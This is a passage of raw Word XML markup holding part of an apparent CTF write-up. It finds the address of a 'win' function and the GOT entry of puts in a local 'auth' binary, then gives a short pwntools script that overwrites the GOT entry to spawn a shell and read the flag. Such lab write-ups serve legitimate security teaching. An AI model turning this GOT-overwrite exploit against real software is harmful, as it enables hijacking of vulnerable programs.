          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="f5871f"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0x804863c</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="f5871f"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0x804865c</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">\           </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="f5871f"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0x080483d0</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">      ff250ca00408   jmp dword [reloc.puts]      ; </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="f5871f"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0x804a00c</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:spacing w:after="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:pBdr>
          <w:top w:color="000000" w:space="0" w:sz="0" w:val="none"/>
          <w:left w:color="000000" w:space="0" w:sz="0" w:val="none"/>
          <w:bottom w:color="000000" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="000000" w:space="0" w:sz="0" w:val="none"/>
          <w:between w:color="000000" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:spacing w:after="300" w:line="408" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As you can see, the address for the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">win</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> function is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0x0804854b</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the GOT address of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">puts</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> function is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0x804a00c</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Now with the two values (if you recompile the binary, they might be different), we can quickly write a script to spawn a shell and retrieve the flag:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="8959a8"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> pwn </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="8959a8"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">putsGOT = </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="718c00"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'0804a00c'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">winAddr = </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="718c00"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'0804854b'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">io = process(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="718c00"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'./auth’</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">io.sendlineafter(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="718c00"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'?\n'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, putsGOT)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">io.sendlineafter(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="718c00"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'\n'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, winAddr)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">io.interactive()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">
      <w:pPr>
        <w:pageBreakBefore w:val="0"/>
        <w:spacing w:after="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="808080"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:highlight w:val="white"/>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youtube.com/watch?v=kUk5pw4w0h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sqiRpJG1hkxHTJAExAOjIaTWEQ==">CgMxLjA4AHIhMWwzVmNxcTdWS0NucmV3RGRvcHhsN0dxRUtrQjNQWDdF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